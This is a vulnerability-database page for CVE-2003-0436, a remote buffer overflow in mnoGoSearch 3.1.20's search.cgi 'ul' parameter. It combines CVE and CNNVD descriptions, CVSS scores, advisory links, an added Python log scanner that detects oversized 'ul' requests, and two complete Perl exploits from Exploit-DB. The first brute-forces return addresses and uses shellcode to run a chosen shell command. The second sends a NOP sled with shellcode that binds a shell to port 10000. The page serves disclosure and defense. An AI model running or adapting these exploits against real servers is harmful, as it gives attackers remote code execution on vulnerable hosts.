CVE-2003-0436
CVSS 7.5
Published: 2003-07-24 00:00:00
Revised: 2008-09-10 15:19:00

[Original] Buffer overflow in search.cgi for mnoGoSearch 3.1.20 allows remote attackers to execute arbitrary code via a long ul parameter.


[CNNVD] MNOGoSearch search.cgi 'ul' Parameter Remote Buffer Overflow Vulnerability (CNNVD-200307-040)

        
        mnoGoSearch是一款多功能的基于WEB的搜索引擎。
        mnoGoSearch对用户提交的'ul'变量值缺少正确的边界缓冲区检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以WEB进程权限在系统上执行任意指令。
        'ul'变量用于指定搜索的URL值,攻击者提供超过5000字节的字符串作为'ul'变量,可覆盖堆栈中任意地址,精心构建提交数据可能以WEB权限在系统上执行任意指令。
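A defender-side check for the traffic pattern described above, written as an added example that is not part of the CNNVD record or of mnoGoSearch itself. It scans constructed Apache-style access-log lines for requests to search.cgi whose 'ul' value is far longer than any real URL, carries raw non-printable bytes, or is mostly one repeated filler byte. The log format, the 1024-byte length threshold, the 64-byte filler-run threshold and the sample lines are all assumptions made for the example.

```python
"""Flag suspicious 'ul' values sent to search.cgi in web-server access logs.

Added detection example (not part of the advisory or of mnoGoSearch). It looks
for the traffic shape the advisory describes: a request to search.cgi whose 'ul'
query parameter is far longer than any real URL and/or carries raw non-printable
bytes, the signature of padding plus overwritten stack addresses.
"""
import re
from typing import Dict, List, Optional

# Assumption: legitimate 'ul' values are ordinary URLs, so anything over this
# many bytes is treated as abnormal (the advisory cites >5000 bytes as the
# overflowing size; the threshold here is deliberately much lower).
MAX_UL_LEN = 1024
# Assumption: a run of this many identical bytes indicates filler, not a URL.
MIN_FILLER_RUN = 64

# Apache/NCSA-style request line: client, identd, user, [time], "request", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)


def decode_bytes(value: str) -> bytes:
    """Turn a logged query value back into raw bytes.

    Apache writes unprintable request bytes as \\xHH; clients percent-encode as %HH.
    Both are decoded so the length and byte-class checks see what the CGI saw.
    """
    raw = value.encode("latin-1", "replace")
    raw = re.sub(rb"\\x([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), raw)
    raw = re.sub(rb"%([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), raw)
    return raw


def extract_ul(target: str) -> Optional[bytes]:
    """Return the decoded 'ul' parameter of a search.cgi request, else None."""
    path, _, query = target.partition("?")
    if not path.endswith("/search.cgi"):
        return None
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == "ul":
            return decode_bytes(value)
    return None


def longest_run(data: bytes) -> int:
    """Length of the longest run of one repeated byte value (0 for empty input)."""
    best = run = 0
    prev = None
    for b in data:
        run = run + 1 if b == prev else 1
        prev = b
        best = max(best, run)
    return best


def analyze(line: str) -> Optional[Dict]:
    """Score one access-log line; None if it is not a search.cgi request carrying 'ul'."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ul = extract_ul(m.group("target"))
    if ul is None:
        return None
    reasons: List[str] = []
    if len(ul) > MAX_UL_LEN:
        reasons.append(f"ul length {len(ul)} exceeds {MAX_UL_LEN}")
    non_printable = sum(1 for b in ul if b < 0x20 or b > 0x7E)
    if non_printable:
        reasons.append(f"{non_printable} non-printable bytes in ul")
    run = longest_run(ul)
    if run >= MIN_FILLER_RUN:
        reasons.append(f"run of {run} identical bytes in ul")
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "status": m.group("status"),
        "ul_len": len(ul),
        "reasons": reasons,
        "suspicious": bool(reasons),
    }


def scan(lines) -> List[Dict]:
    """Return the findings for every suspicious line."""
    return [r for r in (analyze(l) for l in lines) if r and r["suspicious"]]


# Constructed sample log lines (not real traffic). The second mimics the
# described overflow: thousands of filler bytes followed by repeated raw
# address bytes, written the way Apache escapes them in the log.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Jun/2003:13:55:36 +0000] "GET /cgi-bin/search.cgi?q=kernel'
    '&ul=http%3A%2F%2Fwww.example.com%2Fdocs%2F HTTP/1.1" 200 5120',
    '10.0.0.9 - - [10/Jun/2003:13:57:02 +0000] "GET /cgi-bin/search.cgi?ul='
    + "B" * 5000 + "\\x5c\\x10\\xff\\xbf" * 4 + ' HTTP/1.1" 500 -',
    '10.0.0.7 - - [10/Jun/2003:13:58:10 +0000] "GET /index.html HTTP/1.0" 200 1043',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["ts"], finding["ip"], finding["status"], "; ".join(finding["reasons"]))
```

The same three conditions (oversized parameter, raw non-printable bytes, long filler runs) translate directly into a reverse-proxy or WAF rule that bounds the length of 'ul' and of the whole query string before the request reaches the CGI; upgrading to the fixed version remains the actual remedy.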
        

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may degrade or access to resources may be interrupted]
Access complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0436
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0436
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200307-040
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/7865
(VENDOR_ADVISORY)  BID  7865
http://lists.grok.org.uk/pipermail/full-disclosure/2003-June/005543.html
(UNKNOWN)  FULLDISC  20030610 mnogosearch 3.1.20 and 3.2.10 buffer overflow

- Vulnerability information

MNOGoSearch search.cgi 'ul' Parameter Remote Buffer Overflow Vulnerability
High  Boundary Condition Error
2003-07-24 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and patches

Vendor patch:
mnoGoSearch
-----------
The vendor has released an upgrade that fixes this security issue; download it from the vendor's homepage:
mnoGoSearch mnoGoSearch 3.2.10:
mnoGoSearch Upgrade mnoGoSearch CVS

http://www.mnogosearch.org/download.html

- Vulnerability information (22753)

MNOGoSearch 3.1.20 Search.CGI UL Buffer Overflow Vulnerability (1) (EDBID:22753)
cgi remote
2003-06-10 Verified
0 pokleyzz
N/A
source: http://www.securityfocus.com/bid/7865/info

mnoGoSearch 'search.cgi' has been reported prone to a buffer overflow vulnerability.

The issue is a result of a lack of sufficient bounds checking performed on user-supplied URI parameters that are passed to the 'search.cgi' application.

It may be possible for an attacker to exploit this vulnerability and have arbitrary code executed in the context of the web-server process.

#!/usr/bin/perl
# 
# [ reloaded ] 
# mencari_sebuah_nama.pl v2.0
# mnogosearch 3.1.x (http://www.mnogosearch.org) exploit for linux ix86
# by pokleyzz of d'scan clanz (05-2003)
#
# Greet: 
#	tynon, sk ,wanvadder, s0cket370, flyguy, sutan ,spoonfork, Schm|dt, 
#	kerengge_kurus, b0iler and d'scan clanz.
#
# Shout to:
#	#mybsd, #mylinux, #vuln
#
# Special thanks:
#	Skywizard of mybsd
#   
# ---------------------------------------------------------------------------- 
# "TEH TARIK-WARE LICENSE" (Revision 1): 
# wrote this file. As long as you retain this notice you 
# can do whatever you want with this stuff. If we meet some day, and you think 
# this stuff is worth it, you can buy me a "teh tarik" in return. 
# ---------------------------------------------------------------------------- 
# (Base on Poul-Henning Kamp Beerware)
#
#

use IO::Socket;

$host = "127.0.0.1";
$cmd  = "ls -la";
$searchpath = "/cgi-bin/search.cgi";
$rawret = 0xbfff105c;
$ret = "";
$suffsize = 0;
$port = 80;

my $conn;


if ($ARGV[0]){
	$host = $ARGV[0];	
}
else {
	print "[x] mnogosearch 3.1.x exploit for linux ix86 \n\tby pokleyzz of d' scan clanz\n\n";
	print "Usage:\n mencari_sebuah_nama.pl host [command] [path] [port] [suff] [ret]\n";
	print "\thost\thostname to exploit\n";
	print "\tcommand\tcommand to execute on server\n";
	print "\tpath\tpath to search.cgi default /cgi-bin/search.cgi\n";
	print "\tport\tport to connect to\n";
	print "\tsuff\tif not success try to use 1, 2 or 3 for suff (default is 0)\n";
	print "\tret\treturn address default bfffd0d0\n";
	exit;
}

if ($ARGV[1]){
	$cmd = $ARGV[1];	
}
if ($ARGV[2]){
	$searchpath = $ARGV[2];	
}
if ($ARGV[3]){
	$port = int($ARGV[3]);	
}
if ($ARGV[4]){
	$suffsize = int($ARGV[4]);	
}	
if ($ARGV[5]){
	$rawret = hex_to_int($ARGV[5]);	
}

#########~~ start function ~~#########
sub hex_to_int {
	my $hs = $_[0];  
	$int = (hex(substr($hs, 0, 2)) << 24) + (hex(substr($hs, 2, 2)) << 16) + (hex(substr($hs, 4, 2)) << 8) + + hex(substr($hs, 6, 2));
	 	
}

sub int_to_hex {
	my $in = $_[0];
	$hex = sprintf "%x",$in;
}

sub string_to_ret {
	my $rawret = $_[0];
	if (length($rawret) != 8){
		print $rawret;
		die "[*] incorrect return address ...\n ";
	} else {
		$ret = chr(hex(substr($rawret, 2, 2)));
		$ret .= chr(hex(substr($rawret, 0, 2)));
		$ret .= chr(hex(substr($rawret, 6, 2)));
    		$ret .= chr(hex(substr($rawret, 4, 2)));
    		
	}	
	
}

sub connect_to {
	#print "[x] Connect to $host on port $port ...\n";
	$conn = IO::Socket::INET->new (
					Proto => "tcp",
					PeerAddr => "$host",
					PeerPort => "$port",
					) or die "[*] Can't connect to $host on port $port ...\n";
	$conn-> autoflush(1);
}

sub check_version {
	my $result;
	connect_to();
	print "[x] Check if $host use correct version ...\n";
	print $conn "GET $searchpath?tmplt=/test/testing123 HTTP/1.1\nHost: $host\nConnection: Close\n\n"; 
	
	# capture result              
	while ($line = <$conn>) { 
		$result .= $line;
		};
	
	close $conn;
	if ($result =~ /_test_/){
		print "[x] Correct version detected .. possibly vulnerable ...\n";
	} else {
		print $result;
		die "[x] New version or wrong url\n";
	}	
}

sub exploit {
	my $rw = $_[0];
	$result = "";
	# linux ix86 shellcode rip from phx.c by proton
	$shellcode = "\xeb\x3b\x5e\x8d\x5e\x10\x89\x1e\x8d\x7e\x18\x89\x7e\x04\x8d\x7e\x1b\x89\x7e\x08"
	             ."\xb8\x40\x40\x40\x40\x47\x8a\x07\x28\xe0\x75\xf9\x31\xc0\x88\x07\x89\x46\x0c\x88"
	             ."\x46\x17\x88\x46\x1a\x89\xf1\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
	             ."\x80\xe8\xc0\xff\xff\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	             ."\x41\x41"
	             ."/bin/sh -c echo 'Content-Type: text/hello';echo '';"
	             ."$cmd"
	             ."@";
	$strret = int_to_hex($rw);
	$ret = string_to_ret($strret);
	$envvar = 'B' x (4096 - length($shellcode));
	$envvar .= $shellcode;
	
	# generate query string
	$buffer = "B" x $suffsize;
	$buffer .= "B" x 4800;
	$buffer .= $ret x 200;
	
	$request = "GET $searchpath?ul=$buffer HTTP/1.1\n"
		   ."Accept: $envvar\n"
		   ."Accept-Language: $envvar\n"
		   ."Accept-Encoding: $envvar\n"
		   ."User-Agent: Mozilla/4.0\n"
		   ."Host: $host\n"
		   ."Connection: Close\n\n";
	
	&connect_to;
	print "[x] Sending exploit code ..\n";
	print "[x] ret: $strret\n";
	print "[x] suf: $suffsize\n";
	print "[x] length:",length($request),"\n";
	print $conn "$request";
	while ($line = <$conn>) { 
		$result .= $line;
		};
	close $conn;
	
}

sub check_result {
	if ($result =~ /hello/ && !($result =~ /text\/html/)){
		print $result;
		$success = 1;
	} else {
		print $result;
		print "[*] Failed ...\n";
		$success = 0;
	}
}
#########~~ end function ~~#########

&check_version;
for ($rawret; $rawret < 0xbfffffff;$rawret += 1024){
	&exploit($rawret);
	&check_result;
	if ($success == 1){
		exit;
	}
	sleep 1;
}

# generate shellcode


		

- Vulnerability information (22754)

MNOGoSearch 3.1.20 Search.CGI UL Buffer Overflow Vulnerability (2) (EDBID:22754)
cgi remote
2003-06-10 Verified
0 inv
N/A
source: http://www.securityfocus.com/bid/7865/info
 

# shellcode binds shell to port 10000

use IO::Socket;

unless (@ARGV > 0) { die "Usage ./DSR-mnogo IP"}

$host = shift(@ARGV);
$ret = pack("l",0xbfbff670);
$nop = "\x90"x5402;

$shellcode = 
"\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x52\x66\x68\x27\x10\x66\x51\x89\xe6\xb1\x10\x51\x56\x50\x50\xb0\x68\xcd\x80\x51\x53\x53\xb0\x6a\xcd\x80\x52\x52\x53\x53\xb0\x1e\xcd\x80\xb1\x03\x89\xc3\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80";


$exploit_string = $nop.$shellcode.$ret.$ret;


print "\nRemote Mnogo Exploit \n";
print "Code by inv \n\n";
print "Host: $host\n";

$remote = IO::Socket::INET->new(

	Proto	 	=>	"tcp",
	PeerAddr	=>	$host,
	PeerPort	=>	"http(80)",
	);

$remote->autoflush(1);

print $remote "GET /cgi-bin/search.cgi?ul=$exploit_string HTTP/1.0\n\n";

while ( <$remote> ) { print }

close $remote;


		

- Vulnerability information

11872
mnoGoSearch search.cgi ul Parameter Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity

- Vulnerability description

Unknown or Incomplete

- Timeline

2003-06-11 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

MNOGoSearch Search.CGI UL Buffer Overflow Vulnerability
Boundary Condition Error 7865
Yes No
2003-06-10 12:00:00 2009-07-11 10:06:00
Discovery of this vulnerability has been credited to pokleyzz <pokleyzz@scan-associates.net>.

- Affected program versions

mnoGoSearch mnoGoSearch 3.1.20

- Vulnerability discussion

mnoGoSearch 'search.cgi' has been reported prone to a buffer overflow vulnerability.

The issue is a result of a lack of sufficient bounds checking performed on user-supplied URI parameters that are passed to the 'search.cgi' application.

It may be possible for an attacker to exploit this vulnerability and have arbitrary code executed in the context of the web-server process.

- Exploitation

The following exploits are available:

- Solution

The vendor has addressed this issue in the current version of this software and a fix is available at the cvs repository for this product:

Conectiva has released a security advisory (CLA-2003:711) and fixes to address this issue. Details regarding applying fixes can be found in the referenced advisory, fixes are linked below.


mnoGoSearch mnoGoSearch 3.1.20

- Related references

 

 
